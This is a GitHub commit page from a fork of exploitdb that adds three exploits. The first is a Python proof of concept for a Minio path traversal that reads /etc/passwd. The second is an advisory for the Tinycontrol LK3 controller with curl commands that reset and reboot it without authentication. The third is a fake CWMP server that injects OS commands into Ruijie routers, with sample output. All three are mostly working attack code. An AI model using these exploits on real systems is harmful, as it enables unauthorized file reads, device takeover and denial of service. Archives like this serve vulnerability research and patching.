forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge remote-tracking branch 'upstream/main'
- Loading branch information
Showing
24 changed files
with
2,075 additions
and
5 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,81 @@ | ||
# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal | ||
# Date: 2023-09-02 | ||
# Exploit Author: Jenson Zhao | ||
# Vendor Homepage: https://min.io/ | ||
# Software Link: https://github.com/minio/minio/ | ||
# Version: Up to (excluding) 2022-07-29T19-40-48Z | ||
# Tested on: Windows 10 | ||
# CVE : CVE-2022-35919 | ||
# Required before execution: pip install minio,requests | ||
import urllib.parse | ||
import requests, json, re, datetime, argparse | ||
from minio.credentials import Credentials | ||
from minio.signer import sign_v4_s3 | ||
|
||
|
||
class MyMinio(): | ||
secure = False | ||
|
||
def __init__(self, base_url, access_key, secret_key): | ||
self.credits = Credentials( | ||
access_key=access_key, | ||
secret_key=secret_key | ||
) | ||
if base_url.startswith('http://') and base_url.endswith('/'): | ||
self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd' | ||
elif base_url.startswith('https://') and base_url.endswith('/'): | ||
self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd' | ||
self.secure = True | ||
else: | ||
print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n') | ||
|
||
def poc(self): | ||
datetimes = datetime.datetime.utcnow() | ||
datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ') | ||
urls = urllib.parse.urlparse(self.url) | ||
headers = { | ||
'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', | ||
'X-Amz-Date': datetime_str, | ||
'Host': urls.netloc, | ||
} | ||
headers = sign_v4_s3( | ||
method='POST', | ||
url=urls, | ||
region='', | ||
headers=headers, | ||
credentials=self.credits, | ||
content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', | ||
date=datetimes, | ||
) | ||
if self.secure: | ||
response = requests.post(url=self.url, headers=headers, verify=False) | ||
else: | ||
response = requests.post(url=self.url, headers=headers) | ||
try: | ||
message = json.loads(response.text)['Message'] | ||
pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)' | ||
matches = re.findall(pattern, message) | ||
if matches: | ||
print('There is CVE-2022-35919 problem with the url!') | ||
print('The contents of the /etc/passwd file are as follows:') | ||
for match in matches: | ||
print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5], | ||
match[6])) | ||
else: | ||
print('There is no CVE-2022-35919 problem with the url!') | ||
print('Here is the response message content:') | ||
print(message) | ||
except Exception as e: | ||
print( | ||
'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:') | ||
print(response.text) | ||
|
||
|
||
if __name__ == '__main__': | ||
parser = argparse.ArgumentParser() | ||
parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/") | ||
parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin") | ||
parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin") | ||
args = parser.parse_args() | ||
minio = MyMinio(args.url, args.accesskey, args.secretkey) | ||
minio.poc() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,47 @@ | ||
Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service | ||
Exploit Author: LiquidWorm | ||
|
||
Vendor: Tinycontrol | ||
Product web page: https://www.tinycontrol.pl | ||
Affected version: <=1.58a, HW 3.8 | ||
|
||
Summary: Lan Controller is a very universal | ||
device that allows you to connect many different | ||
sensors and remotely view their readings and | ||
remotely control various types of outputs. | ||
It is also possible to combine both functions | ||
into an automatic if -> this with a calendar | ||
when -> then. The device provides a user interface | ||
in the form of a web page. The website presents | ||
readings of various types of sensors: temperature, | ||
humidity, pressure, voltage, current. It also | ||
allows you to configure the device, incl. event | ||
setting and controlling up to 10 outputs. Thanks | ||
to the support of many protocols, it is possible | ||
to operate from smartphones, collect and observ | ||
the results on the server, as well as cooperation | ||
with other I/O systems based on TCP/IP and Modbus. | ||
|
||
Desc: The controller suffers from an unauthenticated | ||
remote denial of service vulnerability. An attacker | ||
can issue direct requests to the stm.cgi page to | ||
reboot and also reset factory settings on the device. | ||
|
||
Tested on: lwIP | ||
|
||
|
||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic | ||
@zeroscience | ||
|
||
|
||
Advisory ID: ZSL-2023-5785 | ||
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php | ||
|
||
|
||
18.08.2023 | ||
|
||
-- | ||
|
||
|
||
$ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings | ||
$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1 # reboot controller |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,176 @@ | ||
# Exploit Title: Ruijie Reyee Wireless Router firmware version B11P204 - MITM Remote Code Execution (RCE) | ||
# Date: April 15, 2023 | ||
# Exploit Author: Mochammad Riyan Firmansyah of SecLab Indonesia | ||
# Vendor Homepage: https://ruijienetworks.com | ||
# Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204 | ||
# Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400) | ||
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO | ||
|
||
""" | ||
Summary | ||
======= | ||
The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection. | ||
In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request. | ||
Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server. | ||
Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system. | ||
|
||
This advisory has also been published at https://github.com/ruzfi/advisory/tree/main/ruijie-wireless-router-mitm-rce. | ||
""" | ||
|
||
#!/usr/bin/env python3 | ||
# -*- coding: utf-8 -*- | ||
from html import escape, unescape | ||
import http.server | ||
import socketserver | ||
import io | ||
import time | ||
import re | ||
import argparse | ||
import gzip | ||
|
||
# command payload | ||
command = "uname -a" | ||
|
||
# change this to serve on a different port | ||
PORT = 8080 | ||
|
||
def cwmp_inform(soap): | ||
cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1) | ||
product_class = re.search(r"(?:<ProductClass.*?>)(.*?)(?:<\/ProductClass>)", soap).group(1) | ||
serial_number = re.search(r"(?:<SerialNumber.*?>)(.*?)(?:<\/SerialNumber>)", soap).group(1) | ||
result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}} | ||
parameters = re.findall(r"(?:<P>)(.*?)(?:<\/P>)", soap) | ||
for parameter in parameters: | ||
parameter_name = re.search(r"(?:<N>)(.*?)(?:<\/N>)", parameter).group(1) | ||
parameter_value = re.search(r"(?:<V>)(.*?)(?:<\/V>)", parameter).group(1) | ||
result['parameters'][parameter_name] = parameter_value | ||
return result | ||
|
||
def cwmp_inform_response(): | ||
return """<?xml version='1.0' encoding='UTF-8'?> | ||
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">16</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:InformResponse><MaxEnvelopes>1</MaxEnvelopes></cwmp:InformResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>""" | ||
|
||
def command_payload(command): | ||
current_time = time.time() | ||
result = """<?xml version='1.0' encoding='UTF-8'?> | ||
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand><Mode>config</Mode><CommandList SOAP-ENC:arrayType="xsd:string[1]"><Command>{command}</Command></CommandList></cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(cur_time=current_time, command=command) | ||
return result | ||
|
||
def command_response(soap): | ||
cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1) | ||
command = re.search(r"(?:<Command>)(.*?)(?:<\/Command>)", soap).group(1) | ||
response = re.search(r"(?:<Response>)((\n|.)*?)(?:<\/Response>)", soap).group(1) | ||
result = {'cwmp_id': cwmp_id, 'command': command, 'response': response} | ||
return result | ||
|
||
class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler): | ||
protocol_version = 'HTTP/1.1' | ||
def do_GET(self): | ||
self.send_response(204) | ||
self.end_headers() | ||
|
||
def do_POST(self): | ||
print("[*] Got hit by", self.client_address) | ||
|
||
f = io.BytesIO() | ||
if 'service' in self.path: | ||
stage, info = self.parse_stage() | ||
if stage == "cwmp_inform": | ||
self.send_response(200) | ||
print("[!] Got Device information", self.client_address) | ||
print("[*] Product Class:", info['product_class']) | ||
print("[*] Serial Number:", info['serial_number']) | ||
print("[*] MAC Address:", info['parameters']['mac']) | ||
print("[*] STUN Client IP:", info['parameters']['stunclientip']) | ||
payload = bytes(cwmp_inform_response(), 'utf-8') | ||
f.write(payload) | ||
self.send_header("Content-Length", str(f.tell())) | ||
elif stage == "command_request": | ||
self.send_response(200) | ||
self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly") | ||
print("[*] Device interacting", self.client_address) | ||
print(info) | ||
payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8') | ||
f.write(payload) | ||
self.send_header("Content-Length", str(f.tell())) | ||
else: | ||
print("[*] Command response", self.client_address) | ||
print(unescape(info['response'])) | ||
self.send_response(204) | ||
f.write(b"") | ||
else: | ||
print("[x] Received invalid request", self.client_address) | ||
self.send_response(204) | ||
f.write(b"") | ||
|
||
f.seek(0) | ||
self.send_header("Connection", "keep-alive") | ||
self.send_header("Content-type", "text/xml;charset=utf-8") | ||
self.end_headers() | ||
if f: | ||
self.copyfile(f, self.wfile) | ||
f.close() | ||
|
||
def parse_stage(self): | ||
content_length = int(self.headers['Content-Length']) | ||
post_data = gzip.decompress(self.rfile.read(content_length)) | ||
if "cwmp:Inform" in post_data.decode("utf-8"): | ||
return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8"))) | ||
elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"): | ||
return ("command_response", command_response(post_data.decode("utf-8"))) | ||
else: | ||
return ("command_request", "Ping!") | ||
|
||
def log_message(self, format, *args): | ||
return | ||
|
||
if __name__ == '__main__': | ||
parser = argparse.ArgumentParser() | ||
parser.add_argument('--bind', '-b', default='', metavar='ADDRESS', | ||
help='Specify alternate bind address ' | ||
'[default: all interfaces]') | ||
parser.add_argument('port', action='store', | ||
default=PORT, type=int, | ||
nargs='?', | ||
help='Specify alternate port [default: {}]'.format(PORT)) | ||
args = parser.parse_args() | ||
|
||
Handler = CustomHTTPRequestHandler | ||
with socketserver.TCPServer((args.bind, args.port), Handler) as httpd: | ||
ip_addr = args.bind if args.bind != '' else '0.0.0.0' | ||
print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port)) | ||
try: | ||
httpd.serve_forever() | ||
except KeyboardInterrupt: | ||
pass | ||
httpd.server_close() | ||
|
||
|
||
""" | ||
Output | ||
====== | ||
ubuntu:~$ python3 exploit.py | ||
[!] serving fake CWMP server at 0.0.0.0:8080 | ||
[*] Got hit by ('[redacted]', [redacted]) | ||
[!] Got Device information ('[redacted]', [redacted]) | ||
[*] Product Class: EW1200G-PRO | ||
[*] Serial Number: [redacted] | ||
[*] MAC Address: [redacted] | ||
[*] STUN Client IP: [redacted]:[redacted] | ||
[*] Got hit by ('[redacted]', [redacted]) | ||
[*] Device interacting ('[redacted]', [redacted]) | ||
Ping! | ||
[*] Got hit by ('[redacted]', [redacted]) | ||
[*] Command response ('[redacted]', [redacted]) | ||
PING 127.0.0.1 (127.0.0.1): 56 data bytes | ||
64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms | ||
64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms | ||
64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms | ||
64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms | ||
|
||
--- 127.0.0.1 ping statistics --- | ||
4 packets transmitted, 4 packets received, 0% packet loss | ||
round-trip min/avg/max = 0.300/0.335/0.400 ms | ||
Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux | ||
|
||
""" |
Oops, something went wrong.